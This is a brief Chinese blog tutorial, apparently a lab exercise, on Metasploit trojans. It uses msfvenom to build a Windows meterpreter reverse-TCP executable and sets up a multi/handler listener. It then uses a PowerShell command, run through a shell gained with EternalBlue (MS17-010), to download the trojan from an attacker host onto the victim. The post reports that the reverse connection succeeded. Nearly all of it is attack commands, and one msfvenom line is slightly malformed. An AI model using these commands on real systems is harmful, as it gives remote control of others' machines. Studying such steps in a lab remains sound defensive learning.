MSF木马的简单利用

刚刚试了下永恒之蓝,看到有人用木马,也补一下后面的其他
环境和那一片的一样

  1. msfvenom模块,首先生成.exe木马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.77.0.109 lport=4443f exe >/root/1.exe

1.exe 就是木马 要把这个用各种方法去受害机运行

在这里插入图片描述
2. 输入msfconsole进入metasploi
3. 进入监听模块

use exploit/multi/handler
  1. 设置payload反弹
set payload windows/meterpreter/reverse_tcp
  1. 设置监听ip端口
set lhost 10.77.0.109
set lport 4443
要与木马一致
  1. 运行在这里插入图片描述
    kali这边就准备完了,等待上线

在目标主机运行 1.exe 木马

利用是之前的ms17010直接shell

powershell (new-object System.Net.WebClient).DownloadFile( 'http://10.77.0.100/1.exe','c:\1.exe')

在这里插入图片描述
上线成功

后续的。。再写

  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值